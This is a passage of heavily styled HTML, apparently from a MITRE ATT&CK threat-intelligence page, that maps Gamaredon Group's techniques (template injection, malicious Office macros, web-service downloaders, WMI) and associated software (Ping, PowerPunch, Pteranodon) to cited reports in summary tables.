background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has injected malicious macros into all Word and Excel documents on mapped network drives.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:56.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1221"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1221</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 
8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1221"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Template Injection</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used DOCX files to download malicious DOT document templates and has used RTF template injection to download malicious payloads.</span><a href="https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[10]</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; 
font-variant-alternates: normal; vertical-align: baseline;"> </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> can also inject malicious macros or remote templates into documents already present on compromised systems.</span><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 
124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a><a href="https://www.secureworks.com/research/threat-profiles/iron-tilden"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[7]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1204"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; 
font-variant-alternates: normal; vertical-align: baseline;">T1204</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1204/002"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.002</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1204"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">User Execution</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1204/002"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Malicious File</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 
0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has attempted to get users to click on Office attachments with malicious macros embedded.</span><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a><a 
href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a><a href="https://www.secureworks.com/research/threat-profiles/iron-tilden"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[7]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td 
colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1102"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1102</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1102"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Web Service</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; 
font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used GitHub repositories for downloaders which will be obtained by the group's .NET executable on the compromised system.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1047</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p 
style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Windows Management Instrumentation</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used WMI to execute scripts used for discovery.</span><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a></p></td></tr></tbody></table></div><h2 style="line-height: 1.44; margin-top: 0pt; margin-bottom: 4pt;"><span style="font-size: 17pt; color: rgb(57, 67, 76); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"><b>Software</b></span></h2><div style="margin-left:0pt;" align="left"><table style="border:none;border-collapse:collapse;"><colgroup><col><col><col><col></colgroup><tbody><tr style="height:37.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dee2e6 1.5pt;border-top:solid #dfdfdf 0.75pt;vertical-align:bottom;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">ID</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dee2e6 1.5pt;border-top:solid #dfdfdf 0.75pt;vertical-align:bottom;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Name</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dee2e6 1.5pt;border-top:solid #dfdfdf 0.75pt;vertical-align:bottom;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: 
baseline;">References</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dee2e6 1.5pt;border-top:solid #dfdfdf 0.75pt;vertical-align:bottom;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-weight: 700; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Techniques</span></p></td></tr><tr style="height:43pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dee2e6 1.5pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/software/S0097"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">S0097</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dee2e6 1.5pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/software/S0097"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Ping</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 
0.75pt;border-top:solid #dee2e6 1.5pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dee2e6 1.5pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1018"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Remote System Discovery</span></a></p></td></tr><tr style="height:55.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/software/S0685"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">S0685</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 
0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/software/S0685"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">PowerPunch</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1059"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Command and Scripting Interpreter</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: 
baseline;">: </span><a href="https://attack.mitre.org/techniques/T1059/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">PowerShell</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1480"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Execution Guardrails</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1480/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Environmental Keying</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1105"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: 
normal; vertical-align: baseline;">Ingress Tool Transfer</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1027"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Obfuscated Files or Information</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1027/010"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Command Obfuscation</span></a></p></td></tr><tr style="height:96.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/software/S0147"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">S0147</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 
0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/software/S0147"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Pteranodon</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a><a 